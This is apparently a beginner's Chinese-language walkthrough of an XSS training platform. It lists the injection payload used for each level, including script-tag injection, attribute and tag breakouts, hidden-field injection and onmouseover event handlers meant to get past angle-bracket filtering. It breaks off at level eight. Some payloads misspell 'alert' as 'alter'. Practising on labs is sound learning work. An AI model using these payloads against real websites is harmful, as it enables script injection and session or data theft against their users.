实战平台:
第一关 <script>alter(document.domain);</script>
第二关 思路:输入第一关的代码,发现XSS失败 F12查看网页代码,发现敲得代码嵌入了网页代码的vaule值
用双引号将value的双引号闭合和input标签闭合即可 "/><script>alert(document.domain);</script>
第三关 继续先写第一关的代码,F12发现代码出现在<B>标签内,闭合<b>标签,没有。
当时有点懵,新手,要不用buitsuit试试 ,发现有新的参数p2 修改P2的值即可 <script>alter(document.domain);</script>
第四关:f12查看代码发现一个隐藏输入框,在隐藏输入框内的value内输入"/><script>alert(document.domain);</script>
第六关:明显发现过滤了<>字符,不过可以使用 函数 " onmouseover="alert(document.domain);" x=" 一开始只想到了onerror 不过貌似没有触发onerror的条件
第七关:发现只要有“ ,就会自动加上一个”, 而且有意思的地方是输入 1 2 之后会变成value=“1” 2= “”> 那就简单多了,输入1 onmouseover=alert(document.domain);
第八关:发现过滤了
原文:https://www.cnblogs.com/dhfblog/p/12114302.html